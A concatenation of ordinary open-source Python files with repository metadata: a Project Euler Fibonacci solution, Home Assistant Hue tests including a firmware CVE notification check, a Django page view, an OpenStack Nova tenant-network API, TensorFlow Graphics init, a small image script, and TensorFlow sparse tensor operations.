        if cur_term < max_value and cur_term % 2 == 0:
temp_sum += cur_term
return temp_sum
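# A compact cross-check (illustrative only) using the recurrence satisfied by
# the even Fibonacci numbers, E(k) = 4*E(k-1) + E(k-2), starting from 2 and 8.
def _sum_even_fib_check( max_value ):
    a, b, total = 2, 8, 0
    while a < max_value:
        total += a
        a, b = b, 4 * b + a
    return total
# Both approaches give 4613732 for max_value = 4000000.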
print( sum_even_fibonacci( 4000000 ) )
|
mc10/project-euler
|
problem_2.py
|
Python
|
mit
| 430
| 0.025701
|
"""Test Hue setup process."""
from unittest.mock import Mock
import pytest
from homeassistant import config_entries
from homeassistant.components import hue
from homeassistant.setup import async_setup_component
from tests.async_mock import AsyncMock, patch
from tests.common import MockConfigEntry
@pytest.fixture
def mock_bridge_setup():
"""Mock bridge setup."""
with patch.object(hue, "HueBridge") as mock_bridge:
mock_bridge.return_value.async_setup = AsyncMock(return_value=True)
mock_bridge.return_value.api.config = Mock(bridgeid="mock-id")
yield mock_bridge.return_value
async def test_setup_with_no_config(hass):
"""Test that we do not discover anything or try to set up a bridge."""
assert await async_setup_component(hass, hue.DOMAIN, {}) is True
# No flows started
assert len(hass.config_entries.flow.async_progress()) == 0
# No configs stored
assert hass.data[hue.DOMAIN] == {}
async def test_setup_defined_hosts_known_auth(hass):
"""Test we don't initiate a config entry if config bridge is known."""
MockConfigEntry(domain="hue", data={"host": "0.0.0.0"}).add_to_hass(hass)
with patch.object(hue, "async_setup_entry", return_value=True):
assert (
await async_setup_component(
hass,
hue.DOMAIN,
{
hue.DOMAIN: {
hue.CONF_BRIDGES: [
{
hue.CONF_HOST: "0.0.0.0",
hue.CONF_ALLOW_HUE_GROUPS: False,
hue.CONF_ALLOW_UNREACHABLE: True,
},
{hue.CONF_HOST: "1.1.1.1"},
]
}
},
)
is True
)
# Flow started for discovered bridge
assert len(hass.config_entries.flow.async_progress()) == 1
# Config stored for domain.
assert hass.data[hue.DATA_CONFIGS] == {
"0.0.0.0": {
hue.CONF_HOST: "0.0.0.0",
hue.CONF_ALLOW_HUE_GROUPS: False,
hue.CONF_ALLOW_UNREACHABLE: True,
},
"1.1.1.1": {hue.CONF_HOST: "1.1.1.1"},
}
async def test_setup_defined_hosts_no_known_auth(hass):
"""Test we initiate config entry if config bridge is not known."""
assert (
await async_setup_component(
hass,
hue.DOMAIN,
{
hue.DOMAIN: {
hue.CONF_BRIDGES: {
hue.CONF_HOST: "0.0.0.0",
hue.CONF_ALLOW_HUE_GROUPS: False,
hue.CONF_ALLOW_UNREACHABLE: True,
}
}
},
)
is True
)
# Flow started for discovered bridge
assert len(hass.config_entries.flow.async_progress()) == 1
# Config stored for domain.
assert hass.data[hue.DATA_CONFIGS] == {
"0.0.0.0": {
hue.CONF_HOST: "0.0.0.0",
hue.CONF_ALLOW_HUE_GROUPS: False,
hue.CONF_ALLOW_UNREACHABLE: True,
}
}
async def test_config_passed_to_config_entry(hass):
"""Test that configured options for a host are loaded via config entry."""
entry = MockConfigEntry(domain=hue.DOMAIN, data={"host": "0.0.0.0"})
entry.add_to_hass(hass)
mock_registry = Mock()
with patch.object(hue, "HueBridge") as mock_bridge, patch(
"homeassistant.helpers.device_registry.async_get_registry",
return_value=mock_registry,
):
mock_bridge.return_value.async_setup = AsyncMock(return_value=True)
mock_bridge.return_value.api.config = Mock(
mac="mock-mac",
bridgeid="mock-bridgeid",
modelid="mock-modelid",
swversion="mock-swversion",
)
# Can't set name via kwargs
mock_bridge.return_value.api.config.name = "mock-name"
assert (
await async_setup_component(
hass,
hue.DOMAIN,
{
hue.DOMAIN: {
hue.CONF_BRIDGES: {
hue.CONF_HOST: "0.0.0.0",
hue.CONF_ALLOW_HUE_GROUPS: False,
hue.CONF_ALLOW_UNREACHABLE: True,
}
}
},
)
is True
)
assert len(mock_bridge.mock_calls) == 2
p_hass, p_entry = mock_bridge.mock_calls[0][1]
assert p_hass is hass
assert p_entry is entry
assert len(mock_registry.mock_calls) == 1
assert mock_registry.mock_calls[0][2] == {
"config_entry_id": entry.entry_id,
"connections": {("mac", "mock-mac")},
"identifiers": {("hue", "mock-bridgeid")},
"manufacturer": "Signify",
"name": "mock-name",
"model": "mock-modelid",
"sw_version": "mock-swversion",
}
async def test_unload_entry(hass, mock_bridge_setup):
"""Test being able to unload an entry."""
entry = MockConfigEntry(domain=hue.DOMAIN, data={"host": "0.0.0.0"})
entry.add_to_hass(hass)
assert await async_setup_component(hass, hue.DOMAIN, {}) is True
assert len(mock_bridge_setup.mock_calls) == 1
mock_bridge_setup.async_reset = AsyncMock(return_value=True)
assert await hue.async_unload_entry(hass, entry)
assert len(mock_bridge_setup.async_reset.mock_calls) == 1
assert hass.data[hue.DOMAIN] == {}
async def test_setting_unique_id(hass, mock_bridge_setup):
"""Test we set unique ID if not set yet."""
entry = MockConfigEntry(domain=hue.DOMAIN, data={"host": "0.0.0.0"})
entry.add_to_hass(hass)
assert await async_setup_component(hass, hue.DOMAIN, {}) is True
assert entry.unique_id == "mock-id"
async def test_fixing_unique_id_no_other(hass, mock_bridge_setup):
"""Test we set unique ID if not set yet."""
entry = MockConfigEntry(
domain=hue.DOMAIN, data={"host": "0.0.0.0"}, unique_id="invalid-id"
)
entry.add_to_hass(hass)
assert await async_setup_component(hass, hue.DOMAIN, {}) is True
assert entry.unique_id == "mock-id"
async def test_fixing_unique_id_other_ignored(hass, mock_bridge_setup):
"""Test we set unique ID if not set yet."""
MockConfigEntry(
domain=hue.DOMAIN,
data={"host": "0.0.0.0"},
unique_id="mock-id",
source=config_entries.SOURCE_IGNORE,
).add_to_hass(hass)
entry = MockConfigEntry(
domain=hue.DOMAIN, data={"host": "0.0.0.0"}, unique_id="invalid-id",
)
entry.add_to_hass(hass)
assert await async_setup_component(hass, hue.DOMAIN, {}) is True
await hass.async_block_till_done()
assert entry.unique_id == "mock-id"
assert hass.config_entries.async_entries() == [entry]
async def test_fixing_unique_id_other_correct(hass, mock_bridge_setup):
"""Test we remove config entry if another one has correct ID."""
correct_entry = MockConfigEntry(
domain=hue.DOMAIN, data={"host": "0.0.0.0"}, unique_id="mock-id",
)
correct_entry.add_to_hass(hass)
entry = MockConfigEntry(
domain=hue.DOMAIN, data={"host": "0.0.0.0"}, unique_id="invalid-id",
)
entry.add_to_hass(hass)
assert await async_setup_component(hass, hue.DOMAIN, {}) is True
await hass.async_block_till_done()
assert hass.config_entries.async_entries() == [correct_entry]
async def test_security_vuln_check(hass):
"""Test that we report security vulnerabilities."""
assert await async_setup_component(hass, "persistent_notification", {})
entry = MockConfigEntry(domain=hue.DOMAIN, data={"host": "0.0.0.0"})
entry.add_to_hass(hass)
config = Mock(bridgeid="", mac="", modelid="BSB002", swversion="1935144020")
config.name = "Hue"
with patch.object(
hue,
"HueBridge",
Mock(
return_value=Mock(
async_setup=AsyncMock(return_value=True), api=Mock(config=config)
)
),
):
assert await async_setup_component(hass, "hue", {})
await hass.async_block_till_done()
state = hass.states.get("persistent_notification.hue_hub_firmware")
assert state is not None
assert "CVE-2020-6007" in state.attributes["message"]
|
titilambert/home-assistant
|
tests/components/hue/test_init.py
|
Python
|
apache-2.0
| 8,339
| 0.00024
|
from django.views.generic.detail import DetailView
from django.shortcuts import render, redirect
from django.http import Http404
from aspc.folio.models import Page
class AttachedPageMixin(object):
def get_page(self):
try:
return Page.objects.get(slug=self.page_slug)
except Page.DoesNotExist:
return None
def get_context_data(self, **kwargs):
context = super(AttachedPageMixin, self).get_context_data(**kwargs)
context['page'] = self.get_page()
return context
def page_view(request, slug_path):
'''slug_path: ^(?P<slug_path>(?:[\w\-\d]+/)+)$ '''
slug_parts = slug_path.rstrip('/').split('/')
pages = Page.objects.exclude(managed=True)
for part in slug_parts:
try:
new_page = pages.get(slug=part)
except Page.DoesNotExist:
raise Http404
else:
pages = new_page.page_set.all()
return render(request, "folio/page.html", {
"title": new_page.title,
"body": new_page.body,
"page": new_page,
"active_section": new_page.path()[0].slug,
})
|
aspc/mainsite
|
aspc/folio/views.py
|
Python
|
mit
| 1,132
| 0.007951
|
# Copyright 2013 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import netaddr
import netaddr.core as netexc
from oslo.config import cfg
import six
from webob import exc
from nova.api.openstack import extensions
from nova.api.openstack import wsgi
from nova import context as nova_context
from nova import exception
from nova.i18n import _
from nova.i18n import _LE
import nova.network
from nova.openstack.common import log as logging
from nova import quota
CONF = cfg.CONF
CONF.import_opt('enable_network_quota',
'nova.api.openstack.compute.contrib.os_tenant_networks')
CONF.import_opt('use_neutron_default_nets',
'nova.api.openstack.compute.contrib.os_tenant_networks')
CONF.import_opt('neutron_default_tenant_id',
'nova.api.openstack.compute.contrib.os_tenant_networks')
CONF.import_opt('quota_networks',
'nova.api.openstack.compute.contrib.os_tenant_networks')
ALIAS = 'os-tenant-networks'
QUOTAS = quota.QUOTAS
LOG = logging.getLogger(__name__)
authorize = extensions.extension_authorizer('compute', 'v3:' + ALIAS)
def network_dict(network):
# NOTE(danms): Here, network should be an object, which could have come
# from neutron and thus be missing most of the attributes. Providing a
# default to get() avoids trying to lazy-load missing attributes.
return {"id": network.get("uuid", None) or network.get("id", None),
"cidr": str(network.get("cidr", None)),
"label": network.get("label", None)}
class TenantNetworkController(wsgi.Controller):
    def __init__(self, network_api=None):
        # Honor an injected network API if one is supplied; otherwise fall
        # back to the default implementation.
        self.network_api = network_api or nova.network.API()
self._default_networks = []
def _refresh_default_networks(self):
self._default_networks = []
if CONF.use_neutron_default_nets == "True":
try:
self._default_networks = self._get_default_networks()
except Exception:
LOG.exception(_LE("Failed to get default networks"))
def _get_default_networks(self):
project_id = CONF.neutron_default_tenant_id
ctx = nova_context.RequestContext(user_id=None,
project_id=project_id)
networks = {}
for n in self.network_api.get_all(ctx):
networks[n['id']] = n['label']
return [{'id': k, 'label': v} for k, v in networks.iteritems()]
@extensions.expected_errors(())
def index(self, req):
context = req.environ['nova.context']
authorize(context)
networks = list(self.network_api.get_all(context))
if not self._default_networks:
self._refresh_default_networks()
networks.extend(self._default_networks)
return {'networks': [network_dict(n) for n in networks]}
@extensions.expected_errors(404)
def show(self, req, id):
context = req.environ['nova.context']
authorize(context)
try:
network = self.network_api.get(context, id)
except exception.NetworkNotFound:
msg = _("Network not found")
raise exc.HTTPNotFound(explanation=msg)
return {'network': network_dict(network)}
@extensions.expected_errors((403, 404, 409))
@wsgi.response(202)
def delete(self, req, id):
context = req.environ['nova.context']
authorize(context)
reservation = None
try:
if CONF.enable_network_quota:
reservation = QUOTAS.reserve(context, networks=-1)
except Exception:
reservation = None
LOG.exception(_LE("Failed to update usages deallocating "
"network."))
def _rollback_quota(reservation):
if CONF.enable_network_quota and reservation:
QUOTAS.rollback(context, reservation)
try:
self.network_api.delete(context, id)
except exception.PolicyNotAuthorized as e:
_rollback_quota(reservation)
raise exc.HTTPForbidden(explanation=six.text_type(e))
except exception.NetworkInUse as e:
_rollback_quota(reservation)
raise exc.HTTPConflict(explanation=e.format_message())
except exception.NetworkNotFound:
_rollback_quota(reservation)
msg = _("Network not found")
raise exc.HTTPNotFound(explanation=msg)
if CONF.enable_network_quota and reservation:
QUOTAS.commit(context, reservation)
@extensions.expected_errors((400, 403, 503))
def create(self, req, body):
if not body:
_msg = _("Missing request body")
raise exc.HTTPBadRequest(explanation=_msg)
context = req.environ["nova.context"]
authorize(context)
network = body["network"]
keys = ["cidr", "cidr_v6", "ipam", "vlan_start", "network_size",
"num_networks"]
kwargs = {k: network.get(k) for k in keys}
label = network["label"]
if not (kwargs["cidr"] or kwargs["cidr_v6"]):
msg = _("No CIDR requested")
raise exc.HTTPBadRequest(explanation=msg)
if kwargs["cidr"]:
try:
net = netaddr.IPNetwork(kwargs["cidr"])
if net.size < 4:
msg = _("Requested network does not contain "
"enough (2+) usable hosts")
raise exc.HTTPBadRequest(explanation=msg)
except netexc.AddrFormatError:
msg = _("CIDR is malformed.")
raise exc.HTTPBadRequest(explanation=msg)
except netexc.AddrConversionError:
msg = _("Address could not be converted.")
raise exc.HTTPBadRequest(explanation=msg)
networks = []
try:
if CONF.enable_network_quota:
reservation = QUOTAS.reserve(context, networks=1)
except exception.OverQuota:
msg = _("Quota exceeded, too many networks.")
raise exc.HTTPBadRequest(explanation=msg)
try:
networks = self.network_api.create(context,
label=label, **kwargs)
if CONF.enable_network_quota:
QUOTAS.commit(context, reservation)
except exception.PolicyNotAuthorized as e:
raise exc.HTTPForbidden(explanation=six.text_type(e))
except Exception:
if CONF.enable_network_quota:
QUOTAS.rollback(context, reservation)
msg = _("Create networks failed")
LOG.exception(msg, extra=network)
raise exc.HTTPServiceUnavailable(explanation=msg)
return {"network": network_dict(networks[0])}
class TenantNetworks(extensions.V3APIExtensionBase):
"""Tenant-based Network Management Extension."""
name = "TenantNetworks"
alias = ALIAS
version = 1
def get_resources(self):
ext = extensions.ResourceExtension(ALIAS, TenantNetworkController())
return [ext]
def get_controller_extensions(self):
return []
def _sync_networks(context, project_id, session):
ctx = nova_context.RequestContext(user_id=None, project_id=project_id)
ctx = ctx.elevated()
networks = nova.network.api.API().get_all(ctx)
return dict(networks=len(networks))
if CONF.enable_network_quota:
QUOTAS.register_resource(quota.ReservableResource('networks',
_sync_networks,
'quota_networks'))
|
shakamunyi/nova
|
nova/api/openstack/compute/plugins/v3/tenant_networks.py
|
Python
|
apache-2.0
| 8,183
| 0.000122
|
# Copyright 2020 The TensorFlow Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Geometry module."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# pylint: disable=g-import-not-at-top
from tensorflow_graphics.util.doc import _import_tfg_docs
if _import_tfg_docs():
from tensorflow_graphics.geometry import convolution
from tensorflow_graphics.geometry import deformation_energy
from tensorflow_graphics.geometry import representation
from tensorflow_graphics.geometry import transformation
from tensorflow_graphics.util import export_api as _export_api
# API contains submodules of tensorflow_graphics.geometry.
__all__ = _export_api.get_modules()
# pylint: enable=g-import-not-at-top
|
tensorflow/graphics
|
tensorflow_graphics/geometry/__init__.py
|
Python
|
apache-2.0
| 1,274
| 0.005495
|
#!/bin/python2
# Script that replies to username mentions.
import time
import os
import cPickle
import sys
import traceback
import numpy
import sys
from PIL import Image
from urlparse import urlparse
import gabenizer
IMG = "http://i.4cdn.org/r9k/1463377581531.jpg"
def main():
image = gabenizer.process_image(sys.argv[1], './plugins/gabenizer/gabenface.png')
image.save("./plugins/gabenizer/whatfuck.png")
if __name__ == "__main__":
main()
|
rafa1231518/CommunityBot
|
plugins/gabenizer/mentions.py
|
Python
|
gpl-3.0
| 499
| 0.02004
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=g-short-docstring-punctuation
"""Sparse Tensor Representation. See the @{$python/sparse_ops} guide.
@@SparseTensor
@@SparseTensorValue
@@sparse_to_dense
@@sparse_tensor_to_dense
@@sparse_to_indicator
@@sparse_merge
@@sparse_concat
@@sparse_reorder
@@sparse_reshape
@@sparse_slice
@@sparse_split
@@sparse_retain
@@sparse_reset_shape
@@sparse_fill_empty_rows
@@sparse_transpose
@@sparse_reduce_max
@@sparse_reduce_max_sparse
@@sparse_reduce_sum
@@sparse_reduce_sum_sparse
@@sparse_add
@@sparse_softmax
@@sparse_tensor_dense_matmul
@@sparse_maximum
@@sparse_minimum
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import numbers
import numpy as np
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.framework import tensor_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import check_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import gen_sparse_ops
from tensorflow.python.ops import math_ops
# go/tf-wildcard-import
# pylint: disable=wildcard-import
from tensorflow.python.ops.gen_sparse_ops import *
# pylint: enable=wildcard-import
from tensorflow.python.util import deprecation
from tensorflow.python.util.tf_export import tf_export
def _convert_to_sparse_tensor(sp_input):
"""Convert `sp_input` to `SparseTensor` and return it.
Args:
sp_input: `SparseTensor` or `SparseTensorValue`.
Returns:
`sp_input` converted to `SparseTensor`.
Raises:
ValueError: if `sp_input` is neither `SparseTensor` nor `SparseTensorValue`.
"""
if isinstance(sp_input, sparse_tensor.SparseTensorValue):
return sparse_tensor.SparseTensor.from_value(sp_input)
if not isinstance(sp_input, sparse_tensor.SparseTensor):
raise TypeError("Input must be a SparseTensor.")
return sp_input
def _convert_to_sparse_tensors(sp_inputs):
"""Convert `sp_inputs` to `SparseTensor` objects and return them.
Args:
sp_inputs: `list` or `tuple` of `SparseTensor` or `SparseTensorValue`
objects.
Returns:
`sp_inputs` converted to `SparseTensor` objects.
Raises:
ValueError: if any item in `sp_inputs` is neither `SparseTensor` nor
`SparseTensorValue`.
"""
if isinstance(sp_inputs, list):
return [_convert_to_sparse_tensor(sp_input) for sp_input in sp_inputs]
if isinstance(sp_inputs, tuple):
return (_convert_to_sparse_tensor(sp_input) for sp_input in sp_inputs)
raise TypeError("Inputs must be a list or tuple.")
# pylint: disable=protected-access
@tf_export("sparse_concat")
def sparse_concat(axis,
sp_inputs,
name=None,
expand_nonconcat_dim=False,
concat_dim=None):
"""Concatenates a list of `SparseTensor` along the specified dimension.
Concatenation is with respect to the dense versions of each sparse input.
  It is assumed that each input is a `SparseTensor` whose elements are ordered
along increasing dimension number.
If expand_nonconcat_dim is False, all inputs' shapes must match, except for
the concat dimension. If expand_nonconcat_dim is True, then inputs' shapes are
allowed to vary among all inputs.
The `indices`, `values`, and `shapes` lists must have the same length.
If expand_nonconcat_dim is False, then the output shape is identical to the
inputs', except along the concat dimension, where it is the sum of the inputs'
sizes along that dimension.
If expand_nonconcat_dim is True, then the output shape along the non-concat
  dimensions will be expanded to the largest among all inputs, and it is the
  sum of the inputs' sizes along the concat dimension.
The output elements will be resorted to preserve the sort order along
increasing dimension number.
This op runs in `O(M log M)` time, where `M` is the total number of non-empty
values across all inputs. This is due to the need for an internal sort in
order to concatenate efficiently across an arbitrary dimension.
For example, if `axis = 1` and the inputs are
sp_inputs[0]: shape = [2, 3]
[0, 2]: "a"
[1, 0]: "b"
[1, 1]: "c"
sp_inputs[1]: shape = [2, 4]
[0, 1]: "d"
[0, 2]: "e"
then the output will be
shape = [2, 7]
[0, 2]: "a"
[0, 4]: "d"
[0, 5]: "e"
[1, 0]: "b"
[1, 1]: "c"
Graphically this is equivalent to doing
[ a] concat [ d e ] = [ a d e ]
[b c ] [ ] [b c ]
Another example, if 'axis = 1' and the inputs are
sp_inputs[0]: shape = [3, 3]
[0, 2]: "a"
[1, 0]: "b"
[2, 1]: "c"
sp_inputs[1]: shape = [2, 4]
[0, 1]: "d"
[0, 2]: "e"
if expand_nonconcat_dim = False, this will result in an error. But if
expand_nonconcat_dim = True, this will result in:
shape = [3, 7]
[0, 2]: "a"
[0, 4]: "d"
[0, 5]: "e"
[1, 0]: "b"
[2, 1]: "c"
Graphically this is equivalent to doing
[ a] concat [ d e ] = [ a d e ]
[b ] [ ] [b ]
[ c ] [ c ]
Args:
axis: Dimension to concatenate along. Must be in range [-rank, rank),
where rank is the number of dimensions in each input `SparseTensor`.
sp_inputs: List of `SparseTensor` to concatenate.
name: A name prefix for the returned tensors (optional).
expand_nonconcat_dim: Whether to allow the expansion in the non-concat
      dimensions. Defaults to False.
concat_dim: The old (deprecated) name for axis.
Returns:
A `SparseTensor` with the concatenated output.
Raises:
TypeError: If `sp_inputs` is not a list of `SparseTensor`.
"""
axis = deprecation.deprecated_argument_lookup("axis", axis, "concat_dim",
concat_dim)
sp_inputs = _convert_to_sparse_tensors(sp_inputs)
if len(sp_inputs) == 1: # Degenerate case of one tensor.
return sp_inputs[0]
inds = [sp_input.indices for sp_input in sp_inputs]
vals = [sp_input.values for sp_input in sp_inputs]
shapes = [sp_input.dense_shape for sp_input in sp_inputs]
if expand_nonconcat_dim:
max_shape = math_ops.reduce_max(
array_ops.concat(
[array_ops.reshape(shape, [1, -1]) for shape in shapes], 0), 0)
shapes = [
array_ops.concat([
max_shape[:axis], shape[-1:]
if axis == -1 else shape[axis:axis + 1], []
if axis == -1 else max_shape[axis + 1:]
], 0) for shape in shapes
]
output_ind, output_val, output_shape = (
gen_sparse_ops.sparse_concat(inds, vals, shapes, axis, name=name))
return sparse_tensor.SparseTensor(output_ind, output_val, output_shape)
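# A minimal usage sketch mirroring the first example in the sparse_concat
# docstring above, using the TF 1.x graph-mode API; it is never called here.
def _sparse_concat_sketch():
  a = sparse_tensor.SparseTensor(
      indices=[[0, 2], [1, 0], [1, 1]], values=["a", "b", "c"],
      dense_shape=[2, 3])
  b = sparse_tensor.SparseTensor(
      indices=[[0, 1], [0, 2]], values=["d", "e"], dense_shape=[2, 4])
  # The result has dense_shape [2, 7] with values a, d, e, b, c.
  return sparse_concat(axis=1, sp_inputs=[a, b])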
@tf_export("sparse_add")
def sparse_add(a, b, thresh=0):
"""Adds two tensors, at least one of each is a `SparseTensor`.
If one `SparseTensor` and one `Tensor` are passed in, returns a `Tensor`. If
both arguments are `SparseTensor`s, this returns a `SparseTensor`. The order
of arguments does not matter. Use vanilla `tf.add()` for adding two dense
`Tensor`s.
The shapes of the two operands must match: broadcasting is not supported.
The indices of any input `SparseTensor` are assumed ordered in standard
lexicographic order. If this is not the case, before this step run
`SparseReorder` to restore index ordering.
If both arguments are sparse, we perform "clipping" as follows. By default,
if two values sum to zero at some index, the output `SparseTensor` would still
include that particular location in its index, storing a zero in the
corresponding value slot. To override this, callers can specify `thresh`,
indicating that if the sum has a magnitude strictly smaller than `thresh`, its
corresponding value and index would then not be included. In particular,
`thresh == 0.0` (default) means everything is kept and actual thresholding
happens only for a positive value.
For example, suppose the logical sum of two sparse operands is (densified):
[ 2]
[.1 0]
[ 6 -.2]
Then,
* `thresh == 0` (the default): all 5 index/value pairs will be returned.
* `thresh == 0.11`: only .1 and 0 will vanish, and the remaining three
index/value pairs will be returned.
* `thresh == 0.21`: .1, 0, and -.2 will vanish.
Args:
a: The first operand; `SparseTensor` or `Tensor`.
b: The second operand; `SparseTensor` or `Tensor`. At least one operand
must be sparse.
thresh: A 0-D `Tensor`. The magnitude threshold that determines if an
output value/index pair takes space. Its dtype should match that of the
values if they are real; if the latter are complex64/complex128, then the
dtype should be float32/float64, correspondingly.
Returns:
A `SparseTensor` or a `Tensor`, representing the sum.
Raises:
TypeError: If both `a` and `b` are `Tensor`s. Use `tf.add()` instead.
"""
sparse_classes = (sparse_tensor.SparseTensor, sparse_tensor.SparseTensorValue)
if not any(isinstance(inp, sparse_classes) for inp in [a, b]):
raise TypeError("At least one input should be SparseTensor; do you mean to"
" use tf.add()?")
if all(isinstance(inp, sparse_classes) for inp in [a, b]):
a = _convert_to_sparse_tensor(a)
b = _convert_to_sparse_tensor(b)
thresh = ops.convert_to_tensor(
thresh, dtype=a.values.dtype.real_dtype.base_dtype, name="thresh")
output_ind, output_val, output_shape = (
gen_sparse_ops.sparse_add(a.indices, a.values, a.dense_shape,
b.indices, b.values, b.dense_shape, thresh))
# Attempt to get output_shape statically.
a.get_shape().assert_is_compatible_with(b.get_shape())
static_shape = array_ops.broadcast_static_shape(a.get_shape(),
b.get_shape())
if static_shape.is_fully_defined():
output_shape = static_shape.as_list()
return sparse_tensor.SparseTensor(output_ind, output_val, output_shape)
else:
# swap to make `a` the SparseTensor.
if isinstance(b, sparse_classes):
a, b = b, a
return gen_sparse_ops.sparse_tensor_dense_add(a.indices, a.values,
a.dense_shape, b)
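# --- Editor's illustrative sketch (not part of the original module): shows
# --- `sparse_add` with two sparse operands and a `thresh` that prunes
# --- near-zero sums, mirroring the docstring example above. The helper name
# --- `_example_sparse_add_usage` is hypothetical.
def _example_sparse_add_usage():
  """Adds two SparseTensors and drops sums with magnitude < 0.21 (sketch)."""
  sp_a = sparse_tensor.SparseTensor(
      indices=[[0, 0], [2, 0]], values=[0.1, 6.0], dense_shape=[3, 2])
  sp_b = sparse_tensor.SparseTensor(
      indices=[[0, 1], [2, 1]], values=[2.0, -0.2], dense_shape=[3, 2])
  # With thresh=0.21 the entries 0.1 and -0.2 vanish; only [0, 1]: 2.0 and
  # [2, 0]: 6.0 remain in the returned SparseTensor.
  return sparse_add(sp_a, sp_b, thresh=0.21)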
def _sparse_cross(inputs, name=None):
"""Generates sparse cross from a list of sparse and dense tensors.
For example, if the inputs are
* inputs[0]: SparseTensor with shape = [2, 2]
[0, 0]: "a"
[1, 0]: "b"
[1, 1]: "c"
* inputs[1]: SparseTensor with shape = [2, 1]
[0, 0]: "d"
[1, 0]: "e"
* inputs[2]: Tensor [["f"], ["g"]]
then the output will be:
shape = [2, 2]
[0, 0]: "a_X_d_X_f"
[1, 0]: "b_X_e_X_g"
[1, 1]: "c_X_e_X_g"
Args:
inputs: An iterable of `Tensor` or `SparseTensor`.
name: Optional name for the op.
Returns:
A `SparseTensor` of type `string`.
"""
return _sparse_cross_internal(inputs=inputs, hashed_output=False, name=name)
def _sparse_cross_hashed(inputs, num_buckets=0, hash_key=None, name=None):
"""Generates hashed sparse cross from a list of sparse and dense tensors.
For example, if the inputs are
* inputs[0]: SparseTensor with shape = [2, 2]
[0, 0]: "a"
[1, 0]: "b"
[1, 1]: "c"
* inputs[1]: SparseTensor with shape = [2, 1]
[0, 0]: "d"
[1, 0]: "e"
* inputs[2]: Tensor [["f"], ["g"]]
then the output will be:
shape = [2, 2]
[0, 0]: FingerprintCat64(
Fingerprint64("f"), FingerprintCat64(
Fingerprint64("d"), Fingerprint64("a")))
[1, 0]: FingerprintCat64(
Fingerprint64("g"), FingerprintCat64(
Fingerprint64("e"), Fingerprint64("b")))
[1, 1]: FingerprintCat64(
Fingerprint64("g"), FingerprintCat64(
Fingerprint64("e"), Fingerprint64("c")))
Args:
inputs: An iterable of `Tensor` or `SparseTensor`.
num_buckets: An `int` that is `>= 0`.
output = hashed_value%num_buckets if num_buckets > 0 else hashed_value.
hash_key: Integer hash_key that will be used by the `FingerprintCat64`
function. If not given, will use a default key.
name: Optional name for the op.
Returns:
A `SparseTensor` of type `int64`.
"""
return _sparse_cross_internal(
inputs=inputs,
hashed_output=True,
num_buckets=num_buckets,
hash_key=hash_key,
name=name)
_DEFAULT_HASH_KEY = 0xDECAFCAFFE
def _sparse_cross_internal(inputs,
hashed_output=False,
num_buckets=0,
hash_key=None,
name=None):
"""See gen_sparse_ops.sparse_cross."""
if not isinstance(inputs, list):
raise TypeError("Inputs must be a list")
if not all(
isinstance(i, sparse_tensor.SparseTensor) or isinstance(i, ops.Tensor)
for i in inputs):
raise TypeError("All inputs must be SparseTensors")
sparse_inputs = [
i for i in inputs if isinstance(i, sparse_tensor.SparseTensor)
]
dense_inputs = [
i for i in inputs if not isinstance(i, sparse_tensor.SparseTensor)
]
indices = [sp_input.indices for sp_input in sparse_inputs]
values = [sp_input.values for sp_input in sparse_inputs]
shapes = [sp_input.dense_shape for sp_input in sparse_inputs]
out_type = dtypes.int64 if hashed_output else dtypes.string
internal_type = dtypes.string
for i in range(len(values)):
if values[i].dtype != dtypes.string:
values[i] = math_ops.to_int64(values[i])
internal_type = dtypes.int64
for i in range(len(dense_inputs)):
if dense_inputs[i].dtype != dtypes.string:
dense_inputs[i] = math_ops.to_int64(dense_inputs[i])
internal_type = dtypes.int64
indices_out, values_out, shape_out = gen_sparse_ops.sparse_cross(
indices=indices,
values=values,
shapes=shapes,
dense_inputs=dense_inputs,
hashed_output=hashed_output,
num_buckets=num_buckets,
hash_key=hash_key or _DEFAULT_HASH_KEY,
out_type=out_type,
internal_type=internal_type,
name=name)
return sparse_tensor.SparseTensor(indices_out, values_out, shape_out)
def sparse_dense_cwise_add(sp_t, dense_t):
"""Adds up a SparseTensor and a dense Tensor, using these special rules:
(1) Broadcasts the dense side to have the same shape as the sparse side, if
eligible;
(2) Then, only the dense values pointed to by the indices of the SparseTensor
participate in the cwise addition.
By the rules, the result is a logical SparseTensor with exactly the same
indices and shape, but possibly with different non-zero values. The output of
this Op is the resultant non-zero values.
Args:
sp_t: the SparseTensor operand.
dense_t: the dense Tensor operand; must have the same dtype and a
broadcast-compatible shape as `sp_t`.
Returns:
output: the SparseTensor output.
"""
result = gen_sparse_ops.sparse_dense_cwise_add(sp_t.indices, sp_t.values,
sp_t.dense_shape, dense_t)
return sparse_tensor.SparseTensor(sp_t.indices, result, sp_t.dense_shape)
@tf_export("sparse_reorder")
def sparse_reorder(sp_input, name=None):
"""Reorders a `SparseTensor` into the canonical, row-major ordering.
Note that by convention, all sparse ops preserve the canonical ordering
along increasing dimension number. The only time ordering can be violated
is during manual manipulation of the indices and values to add entries.
